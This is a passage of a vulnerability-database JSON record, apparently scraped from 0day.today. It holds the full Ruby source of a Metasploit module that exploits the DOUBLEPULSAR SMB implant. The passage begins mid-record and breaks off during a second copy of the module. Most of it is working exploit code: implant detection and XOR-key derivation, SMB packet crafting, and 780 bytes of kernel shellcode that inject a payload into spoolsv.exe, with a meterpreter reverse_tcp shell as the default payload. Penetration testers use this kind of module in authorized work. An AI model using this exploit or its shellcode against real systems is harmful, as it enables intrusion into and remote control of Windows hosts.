'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T22:41:10", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "088d0322453172175279a873703507ef", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-14T08:19:40", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", 
"700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-14T08:19:40", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-14T08:19:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": 
"https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
